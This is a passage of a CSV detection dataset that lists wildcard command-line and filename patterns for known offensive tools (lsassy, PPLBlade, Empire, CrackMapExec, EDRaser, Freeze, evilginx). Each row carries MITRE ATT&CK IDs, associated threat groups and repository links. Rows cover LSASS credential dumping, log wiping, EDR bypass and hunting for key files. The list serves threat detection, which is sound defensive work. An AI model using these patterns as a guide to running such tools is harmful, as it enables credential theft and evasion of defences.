delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --dump-laps*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --dumpmode network --network raw --ip * --port *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* --dumpmode network --network smb *","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* --dump-name *lsass*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"* --dumpname lsass.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"* duplicates.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -e ppk rsa pem ssh rsa*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* e2e_test.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* eap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"* edge logindata *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"* edge masterkey *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"* edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"* EfsPotato*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* Egress-Assess's FTP server*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* -ElevatedPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"* empire.arguments*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"* empire.client.*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"* empire.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"* empire_exec*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* empireadmin*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -enabled -u * -p * -old-bloodhound*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -encrypt * -process * -sandbox *","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"* enip-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* enum 127.0.0.1 *","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"* enum -passive -d *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* enum_avproducts*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* enum_chrome*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* enum_dns*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -Enumerate * -Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --enum-local-admins*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* epmd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* eppc-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* EternalHushCore *","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"* etumbot.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"* EtwHash*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"* -eval *caplets.update* ui.update*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"* evil.corp *","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"* EvilClippyManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"* evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z" +"* EvilTwinServer *","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"* -ExchHostname * -Password *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"* --excludedcs*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* exclusion.c /Fodefender.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 